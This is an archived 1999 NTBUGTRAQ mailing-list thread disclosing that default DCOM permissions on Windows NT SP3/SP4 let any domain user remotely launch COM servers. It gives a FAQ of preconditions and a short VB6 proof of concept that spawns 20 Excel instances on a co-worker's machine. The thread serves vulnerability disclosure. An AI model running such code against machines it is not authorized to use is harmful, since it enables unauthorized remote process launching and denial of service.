forwarding the followup from NTBUGTRAQ.. -----Original Message----- From: Rob Lempke [mailto:rlempkeat_private] Sent: Monday, August 23, 1999 6:13 AM To: NTBUGTRAQat_private Subject: Re: DCOM attack against NT using VB6 Sorry for the late response, but I was on vacation from August 14 - 22. I received about 75 e-mail on this post, so if you want to post this reply to the mailing list that would be great. A Long Story short, the target (DCOM or server) which must be running the DCOM object (exe, not dll's or ocx's), must be Windows NT, sp3 or sp4 with the rpc service running and the no TCP filters running. The client can be any win32 platform with DCOM installed. (DCOM comes with NT/98 but not 95). The bug is that before service pack 5 (at least here) the Everyone group has DEFAULT ACCESS and LAUNCH permissions. DCOM attack against NT using VB6 FAQ: Q: Did you use a user that had permissions on target? Are you in the same domain? A: The target and I are on the same domain, both as Users (with default user permissions, i.e. not ADMIN). I am an Everyone/Authenticated user from the targets point of view. I can see his/her shares Q: What were the Default DCOM permissions set to on the target? Access: Interactive-Allow Access (This Machine)\Administrator-Allow Access System-Allow Access Everyone-Allow Access Launch: Interactive-Allow Launch (This Machine)\Administrator- Allow Launch System-Allow Launch Everyone- Allow Launch Configuration: Interactive (This Machine)\Administrator-full System-full Creator Owner -special Everyone-read Q: What versions of VB and excel where used? A: I am using VB6, a must to get the CreateObject with the system parameter. It works with both word and excel ver 97 and 2000. Q: What apps use the Default permissions? A: Any that do not provide their own, which seems to be most. This includes office. Q: Can I do this with an ActiveX control? A: NO, DCOM object are ActiveX exe 's. this does not work with ActiveX dll's components in MTS. Q:Does this work with Service Pack 5?, Why not? A: No, because the Everyone group is removed from the default Access(allow) and Launch(allow) permissions groups in DCOMCNFG. Q: Did you modify the access or launch permissions on the target? Where you logged in to the target machine. Did you have an account on that machine? A: No, No and No. -----Original Message----- From: Windows NT BugTraq Mailing List [mailto:NTBUGTRAQat_private]On Behalf Of Rob Lempke Sent: Wednesday, August 11, 1999 3:27 PM To: NTBUGTRAQat_private Subject: DCOM attack against NT using VB6 Using the code below I was able to create 20 instances of Excel on my co-workers machines without modifying their machines at all. The target must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to prevent the attack. Private Sub Command1_Click() Dim xlObj As Object Dim xlCollection As New Collection Dim i As Long For i = 1 To 20 Set xlObj = CreateObject("Excel.Application", "\\NTBox") xlCollection.Add xlObj Next i i = 1 'clean up While xlCollection.Count > 0 xlCollection.Remove (xlCollection.Count) Wend Set xlCollection = Nothing End Sub -Robert E. Lempke -------------------------------------------- Steven Wright one Liners: "Black holes are where God divided by zero." "Quantum Mechanics: The dreams stuff is made of." "Early bird gets the worm, but the second mouse gets the cheese." "If everything seems to be going well, you have obviously overlooked something." "Join the Army, meet interesting people, kill them." "Success always occurs in private, and failure in full view." "Ambition is a poor excuse for not having enough sense to be lazy." "Hard work pays off in the future. Laziness pays off now." "Everyone has a photographic memory. Some don't have film." "Drink until she's cute, but stop before the wedding." --------------------------------------------
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:58:29 PDT